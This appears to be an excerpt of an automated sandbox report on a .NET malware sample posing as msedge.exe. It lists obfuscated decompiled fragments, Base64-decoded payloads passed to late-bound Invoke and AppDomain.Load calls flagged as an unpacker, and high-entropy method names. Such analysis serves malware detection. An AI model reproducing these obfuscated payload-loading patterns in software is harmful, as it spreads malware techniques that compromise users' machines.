Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.t94uAohgClMNGiDKUPqgigxac6h2eIbtBAPZ2dqv3DRWDRo2pOtTaVCLjwpr,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.zxolt5SObzFTQjO829vswBmDSWxIKft7HgpbtwpxGDjeLG6bBUeUlpUc8Bpx,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.Hzyu128Kb4txMdFLF4lSd5TCRvYrQKSXpSb2JDI1BbUtMRGFChCHunHKmiVc,oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR._6kTlYL6PRVMSdZNqHsFeRmMhclyxLcdh2vtkVAqF7PjHP4xQ7uPccJgTTSnD,H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.Flr5iMIHSWkAaO5TnZtLOg1KAACd6BNHnwXXRcRvn691EoyQPx9mCRBJMP7owTpS1CGdx03TsKF2B()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2],H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf._1cty0Xre5iK3NvuPZYC5SFfCRnQTspFqrRn3WmspwJERCl8d0LEPrmlxdanma1IFfLO09nq4a4CNc(Convert.FromBase64String(hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { hCckH3mr87yWVKgoC5LwyA8sEBLkmcIPwEybYlAfJcyYp1CRX1rhcW8DmUHQcBsqq9aPX4N4gROZG7DLRjPydCt8pTam[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: msedge.exe.0.dr, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8 System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn System.AppDomain.Load(byte[])
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	.Net Code: Ld30uHWLu96DPzbvu3QtcZTFW9PX2WtgUpic3EnN6HLUeXAcSFUhIE7BKM3LZ0GYriqMFrtHyv3A2wRe2VOMmj9QEGsn
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	.Net Code: _8ObFPASZAykTLdTWGrjKJjwQRW7To2V6y26O8ecpFCUekD55XhZ97MeBr8mr99eXgS7aK7qrW9iL7 System.AppDomain.Load(byte[])

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B88239D push E95E52EFh; rep ret		0_2_00007FFD9B8823C9
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B880ED5 push ebx; iretd		0_2_00007FFD9B880EEA

Source: msedge.exe, saLegFlLWIYnHSeWv3dKuvYxlBAXmTHWTTd8nhPEV0s8kgvX0KnK54sY3BzWxnqLHENZgXaI21laB.cs	High entropy of concatenated method names: 'sQSXmDnUDsAfju97T4GHND0Z0uVKgt2Mxqo7t5XH9S4wvY0PHwEzytrAFlLor6bpxNRGPJfjvHQ4K', 'Cpv5Bao84GFnCoXnGp3IjwCjhO1ve6BavihEqBd8Mg8gymfiuXSzAenMo2qtBL1I3tdV5WkLerfjP', '_25kPvP9OArsrcjPYqJfiilFphPvUjCmj4yixA6i6x3WwuPJUJCK0Ftu2TZf6RJf9KJbgTKpXoBgPh', 'LrEmMqWlTNaekZzNbYg', 'drEk8ukSJBhglopOpqN', 'F6jgVhJQSYaP8XzgGdS', 'GqXHztI9xiRouhGm5e1', 'unaqJKXMjH76iEVJpTp', 't9CYMR5x907eh9lbi4A', 'pitcvW4eeXhS3YNNwWP'
Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	High entropy of concatenated method names: '_9Bn08TCildwgGWw5ui1D1JlHKr9os8w8oiyRTCS75QEGPFy5vOOSEapjlIVJhGz5BKVc4flDBcVvd', 'lFz4ndxuaDtlpPLzecNUzgTpYa8CepDQ5low2qHA07cRu7f3X6Fn9eGrGm2svNSsH1l5nMWdIN5jb', 'cs5yxcWFG5GMivztSJVWFqFiK8zKDWtDZmYqW8o9tq4Bh5p6JTonUXIyyCwwvu3x0Bngn5AZcOVUs', 'utYPojQAhpBfQP2B0Pqcs5fkaIWNwrJw4RTiWES1ECtGG6Y4d7C4XdMeJLRDhKJwB6gqBrPwSS08Z'
Source: msedge.exe, BQfk76GjfWbOZPmrXrjexbuBgHZzzc2HWRV3JskSba2ioac4wluteJ1owZLN.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tdUcGlOTclDzeVklQUy3QDoZHpgGp3D3cs4WriXkcSEkcgPxiJacMi0Ue0VsXnVzptfRGrwoYA7u5', 'P6BLTPLVpgDpgFiA02p2JkCngv2opgGniph3F2FUG890m8c3tDJsFubAwEB5fCaQWJfDH6p7zlJs2', 'btSJAEQsxcVaLmnVewMgeR6QEjjEOP6yp3vdHTEBaGY3JSoSVANQzN4ebIwfJb4PaMPOrVUSePRrv', 'FN0dHj8mqc6R9DJ2sw4FcVFCsxwX3gPZchRUH5UeCNgsZyoj9oj6UabBGse04kZSroRniqKt16Ggc'
Source: msedge.exe, oki3W4coJSffso6AlSga3ltf5jf2RN6Nzg1npsOU6foKFkshYFENyg8TD1j4VyOJ5kUDBJDhf8T0TJCsZ5mHXmZahCyH.cs	High entropy of concatenated method names: '_4wqgx3rxACvqSTA5TnNFCZ02PTFNEADrSyZcLOFWU9V8p3sFKJ3CnIIFj7g2LZgxdLOyDzlEBH9AH7VGso5fTEgL080f', '_97AW74EnnjelP4PdcT4TH70NjYHSseZLGVKMRACKaUZlzXO0pidIkmboMKZFLIBoFPcsecGLtdf0ugAmWqZC1IFRnYND', '_3xGRxu1RSC26lPmgZf1xU2YD1Sf9hwNOGzBaz91Sd8x4w9KiFC9FDvGhu2LkQ51kvV6zBn0NBC2djcsVL3NhrlH5w0BM', 'eSafZIdZsDiuozAint9nzjfaD0MGjWVC2Pz4aud9EB5vW3cBcjW3KlNAUEtQngFmtujwiZsz0u1KGI6qnzvYaUM7wsJo', 'C3mWZB8wUT1oZ1tSOgF', 'Zx05wMg0LzrEBmHdApu', 'f9UVSBRdtQ3TmmzDXfe', 'q6JxcIobJVuC95ojoKh', 'lhK6vIs1xi2rDf9gkun', 'SlG6dwosjdQHqgo643M'
Source: msedge.exe, x2DOmrf4aoRqGMh2z3QbaZVR6tr9eyzf2AOJ9ZTeCg7qSJkrAjXwddUDGjqXKhMmynIIMO5FArAKUC1xnYWktOfzNH34.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'e4kesvFTjsLd31DsTZZQHM6eMxdwqF3uNdLmQdc59AghcOvWdkE1VAb9zf2gDilmy1inF1fYCLT6wHCD7XICfGuX8CJ0', 'jJcD6g3ZYSJ8NyoOrmU', 'x2L7hDhLm3oJx9Gv3lF', '_4iucraCc2ilKQQVLJW3', 'B2bp9XS4UvQUERhXUxb'
Source: msedge.exe, qkr9F9ibHB8kiD2Cu9GZ4cmCA4nrJ7VVs1AFce4cqds97Fmxrfhxns9iVL9h.cs	High entropy of concatenated method names: '_5BbpTl51Wq9dfGhYnTwOMDKobcARSIOgg7TuRLuXhVGnah64gbIEajDyGpIp', 'Z0douzPzbkLuCx5brDWjtKgQwO2soLzdDpQg3SdvKXZl13SDcY5Ipi1J49w8', 'wAoM6WKp00mJueAI71AFGQ3wqmXEP1pkHB5b09APkIwa0SoeDuJ34CkTOFGQ', 'USt8b06QOt1ruuHADFiuw3w5WoBdzTUUpcO5AbeUoy9MfEr1FkzDRcm5C7Sq', 'A7jDnTxxZGVxJSM6ZVzIuNwT7kNj0ihGLvgPMHPRAt1NeuKD7gm7wDZPbOQg', 'PNT5WaMjY4feO0OxM7kSzb6uxsitzUNHIcPckUl31saejLw0RTeXSKYMUC08', 'NCaYkTTTQJ6httXPbitHIbeXIHkQi9IAA6ATnqWLbN7wdqrep65Sg8hOIvob', 'GzU0vI7e1qQqYVjgl474Qofwqv7jIJEjKfI9FNyHG8VlRYXagvbfYQEtlXdJ', 'xEeWYklEAxw0mi2thoDb2X3e3HLJ4VW5Ix9xJrpokTDMspWyLsKesm8NfegRvEGsnYY8PdfIZZWaYRoRMGlLyj686szu', 'Yz4zxI0GKfm2q0fiDsI92HeeRzFyyDOVHAGxKwYceqxs9nOYwpmJZMen9OZhNKaBiYyhzfSP0nCPQmSiRdEEmP6pFAPY'
Source: msedge.exe, suAjnEJ1tn19sYA8ph0zWO4KI0IAS710e8IdvKQBnFouqwg41s12GOWadMmSoJWXgtPaLiwpYIUTm4RFU37TxMqWnbEW.cs	High entropy of concatenated method names: 'Es9h9uO628y5YKaAkQ7dnwRD30b3fxdzWedVfJCQYelDgDPkdvAjkPOyOqLTB3zYAs22uIUPOGSpXdzy1LJbOPn3pIyw', 'EEJmlnQQEokLnsYFc42', 'MZ1feRe9efQapqQVeeO', 'TZHGqLs9qB9WDqbGRmo', 'TghhsLbD2I8taVjfnXo'
Source: msedge.exe, j4OBjGzsTyn926v13gfaBqAy3UG1OcemEb48CW43hFDL9Rhvuocla1V6yigq1u3yB2KPI83Dfnqe3F3Bjdz6jgdC3Cla.cs	High entropy of concatenated method names: 'Bc6jlvdLiV0eGEtQqUdB7tFmFG7MFYO0nqun0EbTqW3s9xIoMdyz1EELwRR2i0UeEktbcthSIcysLppLTCzTjD9NAusn', '_2LW9I7pYZ3b9EeFJhk327yLmRk5EeoCLfVONfhQkhnxfAC70YWEE8W2WDrB8nHUY2sEvjYgcBjz9DzkFINciGeRvHG3C', 'NwePAVtdHy11RKBkDvm', 'xbGWj78kFh9iVsGKXf1', 'njqZOXLiYN76Wwj0xvE', '_0PguuGyBRNJpE5Pw5SZ'
Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	High entropy of concatenated method names: '_1VTjDOLdCSMBa2movci95KiSGFSWpLfgnCxb822LlYdca0tRdXmSDMOfnnZ2aiOXLpLBqXHuPEaEjaiHANSrHYJg27am', 'Bm1rIHUShRqE8opCQLf', 'YSV46VLzzcCRjLwgvDZ', 'xyDSkenR4LTnO8VU9gZ', 'vdp4TAUeD1fktVjqvb2'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	High entropy of concatenated method names: '_13q2RwWL6kIdDpZIw5GHl1rQ3LGDf5pk2w4gX5i7a8YN1hzibxZrCrKncOQ4YJorJehilf00i1Uk3', '_1SlNo9r4dH6Xh2hpGrXad1Z7hVyq189HFbq17zwr6n4UrLJzOlIdS8MD9zd3jbVdCBMipX079gPrS', 'DfX3d8XCHeJXBfgwY9DYLb9MJV3sFfrk2Kb7YDsPYNHs3DpkyJMJRtdcmLCOSYQ0yOC9QfvtU5VIx', 'K8K9Uptmcx8N9bKMIudouOFVobs2MiRk3CpDRl0y8bJDvI7zPo2yyE7HblZiQPusApo3lm36KXLMm', '_2fnOX2a9wuPs69oCra5CqyxdF7pQa8WpnNWLpzxiXc1WrlMYdALUsCtgOKa9PsYWsW5Sq2yiDZkGw', 'YMrKRrkfsOT3HBzZWk07KMj14bj6JgDIsk9ymPQ59VViEQAYWsbVJX1tNvbuhKD1oDNealXlAhy1R', 'pYabpkxx09uAXCbSpMvQeovZUw2WDpPNQ92fWuR56kjJvxOAXfznd7S2ismB1s08n4AEy80tr8pYD', 'JAQQxburJhsr6ChC3StZT1JaDnllduJSJBYE073tMrS5IkQG0nGbqDAngBGiOM68J1m5eESWsAU3I', 'I1obCKB8xP1KjlKpQGdiUeGrHS3vEjY8kvwm2oM6Z3b0xNcGoWRvNesiOn2OAqM31glYTMfPXGKOl', 'QXb3jbSbeRJuBdhDWEt7BiFtO5p735MH7Ke30INhXB0F6JiDgFDLe2vKSYrJfJDy0ecVWkcDpXoyN'
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	High entropy of concatenated method names: 'uzfZnNOIdl9ASznhBti6dboQGUqma4csnyt40Om4rHnaR8gBon8wo1R97NHd', 'SsGBh0oAZnPm54HCCLaOkCG4Lrbv74Wo5brscPTBJiQGm96MvIeF8WqunDFa', '_3XyJJJLx3AzBJXgjVLQCy8xcM42rXrJQNq4yyM3rNuh1SeizqwQ8gz9KTrz4', '_9PbgE1vnF2SIsxtso3JzCVhNXapaJAmRvSUj7jErjg4OrGnRQokKpvRveyfr', '_9zo2bjiCfoX22dVwaPQEfQGB5LtI5A1FiJZc8GIuGpX8mDJVmxNIuIcchikq', 'AC6POjmTSJSTzUzSaTPKLP0fQ9X8duqqecIyrV9ooXrHb7GmFR5leKnobNVL', 'ApnmwzOllDhlx7gWCX17rmuKPH77lZvf25oO44AWM0h30Yu7WdJiWbOxnhr4', 'CgzgAOIPBlBeXNNtnCxcBVeHJ0NnaC2t3PCwN9OpjWMxIkW15yrgd1L0K7T5', 'DVKx1JP01mCQmbiVDFdgndGq0yXkDTC9uuhxUsDFPs7n9xfeZvWJdFUPAX3t', 'NexAheQlgE8KiUjgQpt8YGIkhuK151Na2bjE654nWvetAbi5y2m29X5qiE1v'
